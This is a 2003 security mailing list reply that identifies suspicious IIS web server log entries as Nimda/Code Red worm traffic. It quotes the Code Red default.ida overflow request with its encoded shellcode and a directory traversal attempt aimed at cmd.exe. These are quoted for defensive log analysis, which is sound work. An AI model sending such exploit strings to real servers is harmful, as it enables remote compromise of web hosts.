Security Basics mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Suspicious IIS etc...

From: "J. Oquendo" <segment () antioffline com>
Date: Tue, 9 Sep 2003 17:02:01 -0400
Looks like Nimda/Code Red if you ask me.

--------------------------------------------------------------------------
/default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 - 

[ex030908.log (201)] : 2003-09-08 06:31:02 xx.xxxxx.xxx - xxx.xx.xxx.xx 80
GET /<Rejected-By-UrlScan> ~/scripts/..%255c%255c../winnt/system32/cmd.exe
--------------------------------------------------------------------------

-- 
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
exec `echo ajbqghuf|rot13|sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//'`

Jesus Oquendo
sil @ disgraced . org
sil @ antioffline . com

PGP Fingerprint
39A7 24C6 A9A0 6C67 96CA 0302 F1D3 2420 851E E3D0

http://www.antioffline.com

http://www.politrix.org

You're free. And freedom is beautiful. And, you know, 
it'll take time to restore chaos and order, order out
of chaos. But we will." George W. Bush Washington, 
D.C., April 13, 2003

---------------------------------------------------------------------------
Captus Networks 
Are you prepared for the next Sobig & Blaster? 
 - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans 
 - Precisely Define and Implement Network Security 
 - Automatically Control P2P, IM and Spam Traffic 
FIND OUT NOW -  FREE Vulnerability Assessment Toolkit 
http://www.captusnetworks.com/ads/42.htm
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: